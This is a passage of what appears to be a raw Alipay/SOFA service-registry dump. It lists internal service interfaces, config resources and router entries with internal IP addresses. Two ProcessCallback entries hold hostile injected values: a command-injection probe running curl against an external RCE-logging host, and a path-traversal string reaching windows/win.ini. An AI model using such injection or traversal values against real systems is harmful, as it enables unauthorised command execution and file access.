#@#DEFAULT_GROUP","com.alipay.fintradecenter.core.service.repository.CommoditiesLocalUserArrangementRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.QcMessageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.extend-request:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finopencore.common.service.shelf.facade.ShelfTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@arater#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.Arch:name=com.alipay.cif.client.drm.ClientLogControlDrmSwitch.charge.logControlDrmSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.247.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_S_PCREDIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchdt.da.common.service.facade.api.IndexDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.221.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.231.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dwdssp.service.UploadService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.shopprofile.ShopProfileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskmngComplainContentConsultCallBack:1.0:mobilechatRisk@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_JP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minitrans.core.config.drm.MinitransLoadTestSnapshotMsgDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:tradecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.FrdecisionCommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.secucns.api.WeixinApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fincommontaskhub.service.facade.service.spi.FinalizeService:1.0:finopencore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:tsm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opsconfreg.common.service.facade.ConfregDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodtrans.senior.query.facade.ProdtransQueryExtFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.taskcenter.TaskAttachmentServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.64.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.144.167#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileiclib.common.service.facade.admin.service.BaseProductFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaodecision.common.service.facade.api.BaitiaoAgreementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:unique-6263@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.facade.assetroad.NetworkDirectExecService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.61.224#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:OPSSERVER@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.api.tsd.TsdServiceRoutingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_CARDINFO_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditagreement.common.service.agreement.billdate.PcreditBillDateAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.messageSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finbatch:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ipayment.service.facade.query.PayOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgcore.common.service.client.tr.EdgeTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.biz.graphclient.service.GraphValidateService:1.0:2.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageConsumeService:1.0:ldprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.IndustryProxyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:antmember@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amldata.biz.service.impl.supergw.ApiProcessor:1.0:amlRiskFlagProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.produce.AssetProduceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.deploy.ServiceResourceDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromofront.facade.calculate.api.PromoCalculateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.TopNewsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.service.EventHandleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compcore.common.service.facade.ai.ImageSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowAttachmentInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.124.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.service.facade.service.spi.DataLoadService:1.0:clrfinancing_dloader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adcenter.common.service.facade.monkey.AttackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.238.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.smartsql.service.facade.service.FinStockServerV2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_10.15.247.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYANTBUSERVICESESSIONID.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linke.aci.OpenAPIV2Service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.opencore.service.facade.message.UserMsgSubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegeocoding.common.service.facade.BizAreaService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.asset.VcpAssetManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_INVOICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insiop.common.service.facade.visit.InsIopVisitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocontent.common.service.facade.api.hzf.HzfConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.search.MainSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.rest.AntassistantRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbasecore.service.v2.quality.facade.QualityResultQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bktradegw.common.service.facade.FinDataMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.meta.facade.service.FeatureExtService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promoorder.common.service.facade.api.PromoOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.picasso.common.service.facade.slogan.SloganService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.appclient.process.ProcessTaskAccessor:1.0:processmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.mng.TagMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acorchestracore.endpoint.sofarest.ServiceRouterRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.AppConfigUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.CampCacheManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwalm.facade.api.FmALInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:ebppprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fc.mif.common.service.facade.MerchantDataAnalyseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilerelation.common.service.facade.GroupRelationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-lifedatamng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bumng:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:snbdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.pcinstprod.pcinstprod_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedOldData2SyncTableDrm.limitNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ifundcontrolmodel.service.facade.autotest.ModelTaskAutoTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.icif.service.facade.api.UserProfileQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";curl http://86842598-80102053-uniqueId-104003031.rce.noble.log.lynnshare.cc;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.203.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.imemberprod.service.facade.api.BankQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.BusinessFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:pcreditbill@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmobile.servie.facade.api.MerchantInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_TRANSFERPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vega.keeper.service.AntXQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.KoubeiApplyDiscountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:runtimedataweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.certifymng.service.facade.CreateTestAccountFacade:1.0:certifymng_createTestAccountFacade@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sitecenter:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mpaasweb.common.service.facade.replays.BizOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.SOFA:name=com.alipay.revcore.biz.shared.invoice.TaxDayManagerImpl.taxBeginDay,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlequery.common.service.facade.config.api.ScheduleConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fctask.FcTaskSolutionTemplateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iecpprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.GrayFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.CheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.leads.facade.LeadsSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.pollingElasticIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financingcore.moneyfund.facade.query.MFundAccountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paychecker.common.service.paycheckersdk.ReverseRuleChecker:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:baitiaoprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DISCOUNT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.114.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insuserinsight.facade.opportunity.OpportunityMetaMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zmepinfocenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.common.service.facade.api.RhinoBotChatService:1.0:rhino_bot_chat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarvis.service.facade.api.user.NwUserSearchManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accrmcore.common.service.facade.CustomerNewFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.certifymng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insclaiminvestprod.common.service.facade.EmployeeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpunish.common.service.facade.AppealEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.orderfront.common.service.facade.OrderAuditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.crsociety.api.AppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.antgroup.antchain.myentcore.common.service.facade.api.RuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.discount.DiscountExpireService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.report.CustAsReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.text.api.SecuTextFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.adminconsole.scope.AuthScopeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.clientBillCacheThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custview.antg.facade.accesstoken.AgATKOccupationViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tcc.common.service.facade.api.QueryByTagsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.GameAssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.biz.service.assistinvestigate.iciffreeze.IcifFreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.psbp.common.service.ins.InsuranceInstitutionCityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialportal.web.ps.rpc.facade.team.UserTeamFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.meta2:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.itransfercenter.service.facade.api.TransferFundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crsociety.api.HostNameFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodmng.common.service.facade.price.GroupManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergw.d11333aqcn.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkanalysis.common.service.facade.relation.UserMobileRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accorderexprod.biz.accountorder.control.service.auth.builder.orderpay.ResponseToAuthRequestBuilder:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:fuelprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.echox.drm.EchoRecordConfigDrm.recordSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.insclaiminvestcore.common.service.facade.service.SampleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:frboss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.ALIPAYINTLJSESSIONID.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.kof.KofActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-alptwatest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.merchant.MerchantBizBelongService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcore.config.service.PcreditMarkFlagManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCompanyManager.contentCacheProps,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crsociety.api.TrInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.velocity.component.VelocityQueryComponent:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.0.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.236.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.label.api.LabelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.PersonasKycFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.retry.task.generate.GeneratorOrderDRMResource.threadSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudinc:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finsteward.common.service.facade.gconfig.GeneralConfigurationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanmng.core.model.sequence.SequenceFactory:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.169.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.authcenter.service.facade.TokenLifeCycleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.chinfoSpaceList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.emembercenter.facade.OperatorCommonService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.zpublishuiweb.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksigncentre_orderSyncCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","gmportal@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_MODEL-COMPONENT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.orderlink.OrderLinkOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stockassetcore.common.service.facade.api.UserBrokerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cfpcenter.emergency.biz.drm.SystemConfigDrmResource.insertValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilechat.biz.emotion.rpc.api.CustomEmotionRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.video.UploadVideoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promohelix.common.service.facade.SciManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-familycore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.keplerfeature:name=com.alipay.vega.integration.kepler.drm.LogLevelDrm.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findecision.common.service.facade.cardmng.CardMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.4.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.workflow.common.service.facade.feedback.UserFeedbackReplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_ANTFOREST_TRANS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secuinfos.common.service.facade.api.NewsColumnItemFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MAGNUS#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.template.TemplateParserManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@fcservice#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_11.124.185.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.0.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbcdp.neardata.query.service.AdFacadeClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mayibank.bkprocecore.oyz.facade.cross.deploy.DataDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.trade.impl.XTradeParamDrmImpl.precheckModel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkmerchantprod.common.service.facade.IsvOrgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:riskfinder#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mappprod.common.service.facade.feed.FeedsPeriodPushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paychecker.common.service.paycheckersdk.service.ReversePayCheckerService:1.0:paychecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.pcardsales.biz.shared.resource.PcardAccountDrmResource.blackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/����\\\\����\\\\����\\\\����\\\\����\\\\����\\\\����\\\\����\\\\windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@seekers#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.operator.common.service.facade.OperatorLogonQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pcreditmng_imatchProcessCallback@DEFAULT#@#DEFAULT_INSTANCE